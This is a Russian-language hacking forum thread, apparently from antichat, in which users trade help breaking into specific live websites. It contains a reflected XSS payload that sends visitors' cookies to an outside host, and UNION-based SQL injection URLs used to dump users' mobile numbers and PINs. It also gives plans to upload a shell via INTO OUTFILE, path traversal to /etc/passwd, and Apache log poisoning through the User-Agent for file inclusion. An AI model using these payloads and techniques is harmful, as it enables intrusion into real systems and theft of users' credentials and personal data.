Ваши вопросы по уязвимостям.

KPOT_f!nd не помогает если ли еще способы???

 

если не сработает, тогда только искать тебе пассы и тыкатся на рута.

 

Нашел пассивную xss, запрос такого вида:
http://site.ru/index.php?s=w&name=&level_min=%3C%73%63%72%69%70%74%3E%69%6D%67%20%3D%20%6E%65%77%20%49%6D%61%67%65%28%29%3B%20%69%6D%67%2E%73%72%63%20%3D%20%22%68%74%74%70%3A%2F%2F%73%2E%6E%65%74%73%65%63%2E%72%75%2F%64%6F%6F%6D%35%35%2E%67%69%66%3F%22%2B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3B%20%64%6F%63%75%6D%65%6E%74%2E%6C%6F%63%61%74%69%6F%6E%2E%72%65%70%6C%61%63%65%28%27%68%74%74%70%3A%2F%2F%64%6F%6F%6D%35%35%2E%66%72%65%65%68%6F%73%74%69%61%2E%63%6F%6D%2F%27%29%3C%2F%73%63%72%69%70%74%3E&level_max=&subclass2=any&dmg_max=

или тоже самое, что и:

http://site.ru/index.php?s=w&name=&level_min=<script>img = new Image(); img.src = "http://s.netsec.ru/123.gif?"+document.cookie; document.location.replace('http://site2.ru/')</script>&level_max=&subclass2=any&dmg_max=

Почему куки не приходят через Opera? Через IE все отлично! На других не тэстил.

 

Захожу на сайт скачать одну из нескольких лекций, а там ошибка.
т.е. ссылки я вижу, а в описании файла вот такая фигня.
--------------------------------------------------------
Warning: filesize() [function.filesize]: stat failed for /home/www/lyric/pathology.dn.ua/html/lecturies/anomalii.immunnogo.otveta.ukr.doc in /home/www/pathology.dn.ua/html/viewpage.php(26) : eval()'d code on line 56
--------------------------------------------------------
насколько я понимаю файл на сервере превышает максимально допустимый размер
или неправильно написанный скрипт по подсчету размера файла
--------------------------------------------------------
если просто пытаюсь найти уязвимый скрипт выбрасывает на главную сраницу.

можно ли это как-то использовать кроме выяснения полных путей?

 

просто он файла не нашел такого и все, недумаю, что ты сможешь использовать отсутствие файла

 

samarin, eval()'d code on line 56 - тоесть там используется eval() попробуй в разные переменные по подставлять PHP код а вдруг чёнить получится...

 

Вопрос... Возможно ли провести инъекцию в mysql 3 ? Где-то видел статьи на тему, но не нашел. ps инъекция после where

Все, уже нашел, что невозможно Жаль...

 

можно выбирать только из той же таблицы, в которой присутствует иньекция.. или если file_priv есть то можно читать файлы

https://forum.antichat.ru/showpost.php?p=565034&postcount=4

 

полезного особо не вынешь, можно конечно, смотря из какой таблицы выборка идет, например если это таблица аккаунтов пользователя, то можно и пароли поиметь, но это редко случается, также при очень удачном раскладе и шелл можно залить с помощью into outfile например выборка идет из той таблицы, куда ты можешь добавлять что-то, например комментарии, при наличии файл прив ну и всех факторов для залития через into outfile шелл бдует залит

 

Macro
"SQL инъекция в MySQL сервере третей версии"
_http://www.securitylab.ru/contest/212101.php

 

У меня вопрос по SQL ... Нашел скуль, но вывод ответа от SQL сервера на страницу всего выводит по 1 строчке. Я сразу заюзал limit пример

http://sute.ru/index.php?id=-1 union select 1,2,3,4,5,mobile_num,7,8,pin+from+mobile_users+limit+1,1/*

выводит все гуд. Потом делаю так

http://sute.ru/index.php?id=-1 union select 1,2,3,4,5,mobile_num,7,8,pin+from+mobile_users+limit+2,1/*

гуд потом

http://sute.ru/index.php?id=-1 union select 1,2,3,4,5,mobile_num,7,8,pin+from+mobile_users+limit+100,1/*

писит что ошибка... Потом я пробую так

http://sute.ru/index.php?id=-1 union select 1,2,3,4,5,mobile_num,7,8,pin+from+mobile_users+limit+1,100/*

То мне вывождит на страницу 100 номеров + пины к ним... Знаю что юзеров 12к

http://sute.ru/index.php?id=-1 union select 1,2,3,4,5,mobile_num,7,8,pin+from+mobile_users+limit+12000,1/*

Так пашет гуд... соответственно и должно примерно быть около 8-9к номеров мобил...

Суть вопрос в том почему когда я вывожу юзеров то лимит пашет как обычно

12000,1/*

а когда вывожу номер мобил то

1,9000/*

 

select count(mobile_num) from mobile_users

 

Тааак юзверь на счастье оказался root
Будем пробовать шелл Спасибо, честно говоря, не подумал об этом.
Как ни странно, есть все необходимое, и файл прив и добавлять вроде как можно.

 

Вопрос опять по SQL.
Имеется вот такой адрес:
_http://fhplus.ru/gostevaya/index.php?page=1
Если ставлю кавычку после 1, то ошибки никакой не выводит, а вот если 1 убрать и поставить кавычку (вот так :
_http://fhplus.ru/gostevaya/index.php?page='
то выводит ошибку вида -
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-20, 20' at line 1
То есть как мне кажется инъекция есть, но вот составить правильный запрос опять не могу, поскольку нахожусь в процессе обучения и не всё ещё ясно до конца просьба помочь в правильном составлении запроса всем кто может конечно и главное хочет.
Как мне кажется опять ответ есть в сообщении о ошибке, а именно '-20, 20', но как это пристроить в запрос...?
Заранее спасибо и благодарности всем кто подскажет.

 

Климент_Ворошилов
20,-20 это колво допустимых строниц если брать значение больше 22 то выводит пустую 20,-20 сдесь не имеет отношение к скулю
попробуй подобрать кол во таблиц
http://fhplus.ru/gostevaya/index.php?page='+union+select+1,2,3,....стока цифр пока не исчезнет ошибка..../*
дальше меняй значение ?page='+union+select+user(),2,3,....стока цифр пока не исчезнет ошибка..../*
выведет юзера в бд
?page='+union+select+database(),2,3,....стока цифр пока не исчезнет ошибка..../*
имя бд
и тд
прочитай фак там всё написано...

 

ничего не получится . т.к. там явно идут некие математические действия с тем что в переменную передается)

 

Доброе утро всем
Ребята подскажите че можна вытащить через багу в скрипте
ну типа ../etc/passwd
доступна корневая директория, но я все файлы просматриваю только через браузер
пасы не нашел
короче обьясните ламеру блин
возможностей то дафига
откраты почти все директории
плиз
заранее спасибо

p.s.
через браузер вижу записи типа:

Code:

a%[COLOR=DeepSkyBlue]identd[/COLOR]Ék`%[COLOR=MediumTurquoise]htpasswd[/COLOR]’Æ´b%[COLOR=MediumTurquoise]cvsupd[/COLOR]͉`% pkg_fetchBΚ`%pkg_globÇBÎç`%pkg_sortÇBÎ*a%pkgdbÎOa%portcvsweb΂a%portscleanγa%portsdb»a% portupgradeÈb% portversiongd%ftpds]Êud%gss-serverÌwd% k5srvutilfÌxd%kadminÊ?d% kadmin.local~¡À…d%kadmind¹d% kdb5_utilf̺d%klogind»d%

я выделил название файлов
это директ /usr/local/sbin/ к примеру
Только это в сокращеном виде

 

ИМХО - ковырять исходники скриптов в поисках пути получения нормального шелла. Через просмотр файлов редко что-то можно поиметь. Можно поискать бэкапы, там иногда попадаются пароли.

 

bad_script.php?patch=../../../../../../../../../../../../../../../../../../../../../../etc/passwd
нет не то?

 

1. Там инклуд или просто читалка файлов?
2. Если инклуд, тогда гадишь в логах апача (что то типа <?include($_GET["blabla"]);?>) и инклудишь их. Например в UA (юзер агент=\) передаешь ето дело
3. Если читалка файлов, то ищешь конфиги к сайту/форуму/чату, смотря что там у тебя стоит.